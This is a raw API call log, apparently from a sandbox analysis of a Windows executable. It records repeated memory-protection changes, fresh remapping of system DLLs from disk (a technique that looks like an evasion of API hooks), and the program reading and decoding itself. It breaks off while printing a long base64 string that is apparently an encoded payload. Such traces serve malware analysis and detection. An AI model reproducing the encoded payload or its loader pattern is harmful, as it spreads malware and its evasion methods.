returned 1 [0120.774] VirtualProtect (in: lpAddress=0x24e186c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.774] VirtualProtect (in: lpAddress=0x24e186c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.774] VirtualProtect (in: lpAddress=0x24e1870, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.774] VirtualProtect (in: lpAddress=0x24e1870, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.774] VirtualProtect (in: lpAddress=0x24e1880, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.774] VirtualProtect (in: lpAddress=0x24e1880, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.775] VirtualProtect (in: lpAddress=0x24e1884, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.775] VirtualProtect (in: lpAddress=0x24e1884, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.775] VirtualProtect (in: lpAddress=0x24e1888, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.775] VirtualProtect (in: lpAddress=0x24e1888, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.775] VirtualProtect (in: lpAddress=0x24e188c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.775] VirtualProtect (in: lpAddress=0x24e188c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.775] VirtualProtect (in: lpAddress=0x24e1898, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.776] VirtualProtect (in: lpAddress=0x24e1898, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.776] VirtualProtect (in: lpAddress=0x24e189c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.776] VirtualProtect (in: lpAddress=0x24e189c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.776] VirtualProtect (in: lpAddress=0x24e18a0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.776] VirtualProtect (in: lpAddress=0x24e18a0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.777] VirtualProtect (in: lpAddress=0x24e18ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.777] VirtualProtect (in: lpAddress=0x24e18ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.777] VirtualProtect (in: lpAddress=0x24e18b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.777] VirtualProtect (in: lpAddress=0x24e18b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.777] VirtualProtect (in: lpAddress=0x24e18b4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.778] VirtualProtect (in: lpAddress=0x24e18b4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.778] VirtualProtect (in: lpAddress=0x24e18b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.778] VirtualProtect (in: lpAddress=0x24e18b8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.778] VirtualProtect (in: lpAddress=0x24e18bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.778] VirtualProtect (in: lpAddress=0x24e18bc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.778] VirtualProtect (in: lpAddress=0x24e18c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.778] VirtualProtect (in: lpAddress=0x24e18c0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.778] VirtualProtect (in: lpAddress=0x24e18c4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.779] VirtualProtect (in: lpAddress=0x24e18c4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.779] VirtualProtect (in: lpAddress=0x24e18c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.779] VirtualProtect (in: lpAddress=0x24e18c8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.779] VirtualProtect (in: lpAddress=0x24e18d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.779] VirtualProtect (in: lpAddress=0x24e18d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.779] VirtualProtect (in: lpAddress=0x24e18d4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.780] VirtualProtect (in: lpAddress=0x24e18d4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.780] VirtualProtect (in: lpAddress=0x24e18dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.780] VirtualProtect (in: lpAddress=0x24e18dc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.780] VirtualProtect (in: lpAddress=0x24e18e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.780] VirtualProtect (in: lpAddress=0x24e18e0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.780] VirtualProtect (in: lpAddress=0x24e18e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.780] VirtualProtect (in: lpAddress=0x24e18e8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.781] VirtualProtect (in: lpAddress=0x24e18ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.781] VirtualProtect (in: lpAddress=0x24e18ec, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.781] VirtualProtect (in: lpAddress=0x24e18f4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.781] VirtualProtect (in: lpAddress=0x24e18f4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.781] VirtualProtect (in: lpAddress=0x24e18f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.781] VirtualProtect (in: lpAddress=0x24e18f8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.781] VirtualProtect (in: lpAddress=0x24e1900, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.782] VirtualProtect (in: lpAddress=0x24e1900, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.782] VirtualProtect (in: lpAddress=0x24e1904, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.782] VirtualProtect (in: lpAddress=0x24e1904, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.782] VirtualProtect (in: lpAddress=0x24e190c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.782] VirtualProtect (in: lpAddress=0x24e190c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.782] VirtualProtect (in: lpAddress=0x24e1910, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.782] VirtualProtect (in: lpAddress=0x24e1910, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.783] VirtualProtect (in: lpAddress=0x24e191c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.783] VirtualProtect (in: lpAddress=0x24e191c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.783] VirtualProtect (in: lpAddress=0x24e1924, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.783] VirtualProtect (in: lpAddress=0x24e1924, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.783] VirtualProtect (in: lpAddress=0x24e192c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.783] VirtualProtect (in: lpAddress=0x24e192c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.783] VirtualProtect (in: lpAddress=0x24e1934, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.784] VirtualProtect (in: lpAddress=0x24e1934, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.784] VirtualProtect (in: lpAddress=0x24e193c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.784] VirtualProtect (in: lpAddress=0x24e193c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0120.784] VirtualProtect (in: lpAddress=0x24e1940, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19f3f0 | out: lpflOldProtect=0x19f3f0*=0x20) returned 1 [0120.784] VirtualProtect (in: lpAddress=0x24e1940, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x19f3e8 | out: lpflOldProtect=0x19f3e8*=0x40) returned 1 [0121.311] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x24e0000) returned 0x0 [0121.322] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0121.322] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0121.325] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0121.325] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0121.325] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0121.326] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0121.326] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f410 | out: DllHandle=0x19f410*=0x74030000) returned 0x0 [0121.327] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x254 [0121.327] NtCreateSection (in: SectionHandle=0x19f450, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x254 | out: SectionHandle=0x19f450*=0x258) returned 0x0 [0121.327] NtMapViewOfSection (in: SectionHandle=0x258, ProcessHandle=0xffffffff, BaseAddress=0x19f4fc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f45c*=0x13c000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19f4fc*=0x24e0000, SectionOffset=0x0, ViewSize=0x19f45c*=0x13c000) returned 0x40000003 [0121.328] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0122.002] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x24e0000) returned 0x0 [0122.005] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0122.006] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0122.006] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0122.006] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0122.007] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0122.007] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77390000 [0122.008] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f410 | out: DllHandle=0x19f410*=0x74030000) returned 0x0 [0122.008] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x25c [0122.008] NtCreateSection (in: SectionHandle=0x19f450, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x25c | out: SectionHandle=0x19f450*=0x260) returned 0x0 [0122.008] NtMapViewOfSection (in: SectionHandle=0x260, ProcessHandle=0xffffffff, BaseAddress=0x19f4fc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f45c*=0xd0000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19f4fc*=0x6f0000, SectionOffset=0x0, ViewSize=0x19f45c*=0xd0000) returned 0x40000003 [0122.009] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f3b8 | out: DllHandle=0x19f3b8*=0x74030000) returned 0x0 [0122.429] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x6f0000) returned 0x0 [0122.432] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f398 | out: DllHandle=0x19f398*=0x74030000) returned 0x0 [0122.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.432] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0122.433] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f380 | out: DllHandle=0x19f380*=0x74030000) returned 0x0 [0122.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.433] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CreateCheckboxImageListTest.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\createcheckboximagelisttest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0122.434] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f394 | out: DllHandle=0x19f394*=0x74030000) returned 0x0 [0122.434] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.435] GetFileSize (in: hFile=0x264, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x88318 [0122.435] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f38c | out: DllHandle=0x19f38c*=0x74030000) returned 0x0 [0122.435] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.435] VirtualAlloc (lpAddress=0x0, dwSize=0x88318, flAllocationType=0x3000, flProtect=0x4) returned 0x6f0000 [0122.436] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f388 | out: DllHandle=0x19f388*=0x74030000) returned 0x0 [0122.436] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.436] ReadFile (in: hFile=0x264, lpBuffer=0x6f0000, nNumberOfBytesToRead=0x88318, lpNumberOfBytesRead=0x19f414, lpOverlapped=0x0 | out: lpBuffer=0x6f0000*, lpNumberOfBytesRead=0x19f414*=0x88318, lpOverlapped=0x0) returned 1 [0122.446] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f38c | out: DllHandle=0x19f38c*=0x74030000) returned 0x0 [0122.447] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74030000 [0122.447] VirtualAlloc (lpAddress=0x0, dwSize=0x4a704, flAllocationType=0x3000, flProtect=0x4) returned 0x780000 [0122.454] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x19f380 | out: DllHandle=0x19f380*=0x74030000) returned 0x0 [0122.454] GetModuleHandleA (lpModuleName="Crypt32.dll") returned 0x0 [0122.455] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x74440000 [0122.836] CryptStringToBinaryA (in: pszString="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